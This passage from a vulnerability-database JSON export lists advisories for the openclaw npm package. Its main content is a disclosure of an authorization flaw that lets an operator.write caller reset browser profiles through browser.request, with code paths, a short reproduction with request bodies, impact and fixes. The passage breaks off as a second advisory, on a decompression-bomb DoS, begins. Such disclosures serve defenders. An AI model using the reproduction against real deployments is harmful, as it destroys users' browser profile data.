VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"
VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41399","GHSA-f44p-c7w9-7xr7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-37ep-9smd-zuh9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90971?format=json","vulnerability_id":"VCID-384t-z1h8-pfft","summary":"OpenClaw: `browser.request` still allows `POST /reset-profile` through the `operator.write` surface\n> Fixed in 
OpenClaw 2026.3.24, the current shipping release.\n\n# Title\n\n`browser.request` still allows `POST /reset-profile` through the `operator.write` surface in OpenClaw `v2026.3.22` after `GHSA-vmhq-cqm9-6p7q`\n\n## Severity Assessment\n\nHigh\n\nCWE:\n\n- `CWE-863: Incorrect Authorization`\n\nProposed CVSS v3.1:\n\n- `8.1` (`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H`)\n\nAn authenticated caller who only has access to the scoped Gateway method `browser.request` on the `operator.write` surface can still reach a destructive persistent-profile management route.\n\nLikely related advisory family:\n\n- `GHSA-vmhq-cqm9-6p7q`\n\nThis should be treated as a later-version residual or incomplete fix. The earlier fix blocked `POST /profiles/create` and profile deletion, but the latest released `v2026.3.22` code still omits `POST /reset-profile` from the same mutation gate.\n\n## Impact\n\nA caller with `operator.write` access to `browser.request` can still trigger persistent profile reset via `POST /reset-profile`.\n\nThis crosses the intended privilege boundary for browser profile management because the release already attempts to block adjacent persistent profile mutations on this same surface.\n\nIn practice, the allowed route reaches destructive behavior that can:\n\n- stop the running browser for that profile\n- close the Playwright browser connection for that profile\n- move the profile's local `userDataDir` to Trash when it exists\n\nThis is a real integrity and availability impact on persistent browser state, not a route-classification mismatch with no side effects.\n\n## Affected Component\n\nProduct:\n\n- `openclaw`\n\nTested latest released version:\n\n- release tag: `v2026.3.22`\n- release tag target commit (peeled tag): `e7d11f6c33e223a0dd8a21cfe01076bd76cef87a`\n\nPublished artifact for that release:\n\n- package: `openclaw-2026.3.22.tgz`\n- package build-info commit: `4dcc39c25c6cc63fedfd004f52d173716576fcf0`\n- package build-info timestamp: 
`2026-03-23T10:56:05.946Z`\n\nExact vulnerable paths on the shipped tag:\n\n- `src/gateway/method-scopes.ts:114`\n  - `browser.request` is placed on the `operator.write` surface\n- `src/gateway/server-methods/browser.ts:155-165`\n  - requests are only denied when `isPersistentBrowserProfileMutation(method, path)` returns true\n- `src/browser/request-policy.ts:19-25`\n  - the mutation classifier recognizes `POST /profiles/create` and `DELETE /profiles/:name`, but not `POST /reset-profile`\n- `src/browser/routes/basic.ts:161-170`\n  - the browser server exposes `POST /reset-profile`\n- `src/browser/server-context.reset.ts:37-63`\n  - `resetProfile()` stops the browser, closes the connection, and moves the local profile directory to Trash when present\n- `src/node-host/invoke-browser.ts:240-243`\n  - the same route-classification helper is reused in the browser proxy path when profile restrictions are active\n\nRelevant regression coverage gap on the shipped tag:\n\n- `src/gateway/server-methods/browser.profile-from-body.test.ts:104-140`\n  - tests only block `POST /profiles/create` and `DELETE /profiles/:name`\n  - there is no equivalent deny case for `POST /reset-profile`\n\nPublished artifact evidence for the exact released package:\n\n- `openclaw-2026.3.22.tgz::package/dist/build-info.json`\n- `openclaw-2026.3.22.tgz::package/dist/gateway-cli-Cxz4pSoJ.js:11469-11525`\n- `openclaw-2026.3.22.tgz::package/dist/gateway-cli-Cxz4pSoJ.js:11484-11485`\n- `openclaw-2026.3.22.tgz::package/dist/request-policy-nIRryZwZ.js:9-12`\n- `openclaw-2026.3.22.tgz::package/dist/routes-CdaHRCET.js:6874-6889`\n\nImportant release note:\n\n- the published package build-info commit differs from the release tag target commit\n- for this issue, the relevant authorization and route behavior was cross-checked in both the shipped tag source and the published package bundle, and it matches semantically on the vulnerable path\n\n## Technical Reproduction\n\nA direct control/exploit pair can be 
reproduced against the latest released version.\n\nPreconditions:\n\n- use `openclaw@2026.3.22`\n- authenticate as a caller that has access to the scoped Gateway method `browser.request`\n- keep that caller on `operator.write`, not `operator.admin`\n- ensure the target local browser profile exists\n\nReproduction steps:\n\n1. Call `browser.request` with:\n   - `method: \"POST\"`\n   - `path: \"/profiles/create\"`\n   - `body: { \"name\": \"poc-profile\" }`\n2. Observe the control case is rejected with:\n   - `browser.request cannot create or delete persistent browser profiles`\n3. Call `browser.request` again with:\n   - `method: \"POST\"`\n   - `path: \"/reset-profile\"`\n   - `body: { \"profile\": \"poc-profile\", \"name\": \"poc-profile\" }`\n4. Observe that the exploit case is not rejected by the same handler.\n5. Observe that the request is forwarded to the browser route/dispatcher, rather than being denied by the mutation classifier.\n6. Observe that the reset route succeeds and applies profile reset behavior.\n\nWhy this happens in the released code:\n\n- the release tries to gate persistent profile mutation using `isPersistentBrowserProfileMutation(...)`\n- that helper does not classify `POST /reset-profile` as a protected mutation\n- the exposed browser server route still maps `/reset-profile` to `profileCtx.resetProfile()`\n- `resetProfile()` performs state-changing behavior on the selected local profile\n\n## Demonstrated Impact\n\nThe shipped release shows the following behavior difference:\n\nControl case:\n\n- `POST /profiles/create`\n- rejected before the request is dispatched to the browser control path\n\nExploit case:\n\n- `POST /reset-profile`\n- not classified as a blocked mutation\n- remains reachable through the `browser.request` surface\n- reaches `resetProfile()`, which performs destructive profile-management operations\n\nThe reached route has concrete side effects:\n\n- stops the running browser if active\n- closes the Playwright browser 
connection\n- moves the profile's local `userDataDir` to Trash if it exists\n\nThis is therefore a concrete authorization and policy gap on a real destructive profile-management route. It is not a complaint about the existence of `browser.request` by itself.\n\n## Environment\n\nEnvironment used for validation:\n\n- product: `openclaw`\n- latest released version: `2026.3.22`\n- release tag: `v2026.3.22`\n- release tag target commit (peeled tag): `e7d11f6c33e223a0dd8a21cfe01076bd76cef87a`\n- published package: `openclaw-2026.3.22.tgz`\n- published package build-info commit: `4dcc39c25c6cc63fedfd004f52d173716576fcf0`\n\nExplicit trust-model statement:\n\n- this report does **not** rely on adversarial or mutually untrusted operators sharing one gateway host or config\n\nScope check:\n\n- this is **not** a complaint about the existence of the explicit `browser.request` surface by itself\n- this is **not** a prompt-injection-only report\n- this is **not** a multi-tenant shared-gateway claim\n- this is **not** an attack on the unscoped HTTP compatibility endpoints\n- this is a concrete missed route inside an intended privilege gate on a real scoped Gateway method\n- the control case proves the policy is intended to exist on this surface, and the exploit case proves `POST /reset-profile` remains outside that gate in the shipped release\n\n## Remediation Advice\n\nRecommended fix:\n\n1. Extend the persistent-profile mutation classifier to include `POST /reset-profile`.\n2. Reuse the same centralized route classification everywhere the release currently relies on `isPersistentBrowserProfileMutation(...)`, including:\n   - `src/gateway/server-methods/browser.ts`\n   - `src/node-host/invoke-browser.ts`\n3. Add regression coverage with both:\n   - a deny control for `POST /reset-profile` on the lower-privilege `browser.request` surface\n   - an allow control for non-mutating browser profile reads\n4. 
Review nearby profile-management routes for any other state-changing endpoints that are still omitted from the mutation classifier.\n5. Treat `GHSA-vmhq-cqm9-6p7q` as the prior family and close the remaining residual route in the same policy surface.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35653","reference_id":"","reference_type":"","scores":[{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17412","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.1737","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17407","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35653"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xp9r-prpg-373r","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T16:59:20Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xp9r-prpg-373r"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4dcc39c25c6cc63fedfd004f52d173716576fcf0","reference_id":"4dcc39c25c6cc63fedfd004f52d17
3716576fcf0","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T16:59:20Z/"}],"url":"https://github.com/openclaw/openclaw/commit/4dcc39c25c6cc63fedfd004f52d173716576fcf0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35653","reference_id":"CVE-2026-35653","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35653"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e7d11f6c33e223a0dd8a21cfe01076bd76cef87a","reference_id":"e7d11f6c33e223a0dd8a21cfe01076bd76cef87a","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T16:59:20Z/"}],"url":"https://github.com/openclaw/openclaw/commit/e7d11f6c33e223a0dd8a21cfe01076bd76cef87a"},{"reference_url":"https://github.com/advisories/GHSA-xp9r-prpg-373r","reference_id":"GHSA-xp9r-prpg-373r","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xp9r-prpg-373r"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-incorrect-authorization-in-post-reset-profile-via-browser-request","reference_id":"openclaw-incorrect-authorization-in-post-reset-profile-via-browser-request","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","
scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T16:59:20Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-incorrect-authorization-in-post-reset-profile-via-browser-request"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerabi
lity":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerabi
lity":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerabi
lity":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerabi
lity":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["CVE-2026-35653","GHSA-xp9r-prpg-373r"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-384t-z1h8-pfft"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89653?format=json","vulnerability_id":"VCID-38g8-39ek-xbat","summary":"OpenClaw: Image pixel-limit guard can fail open on sips and allow decompression-bomb DoS\n## Summary\nImage pixel-limit guard can fail open on sips and allow decompression-bomb DoS\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Shipped v2026.3.28 image processing could fail open on oversized pixel counts and allow decompression-bomb DoS, an availability issue that is valid at medium.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- 
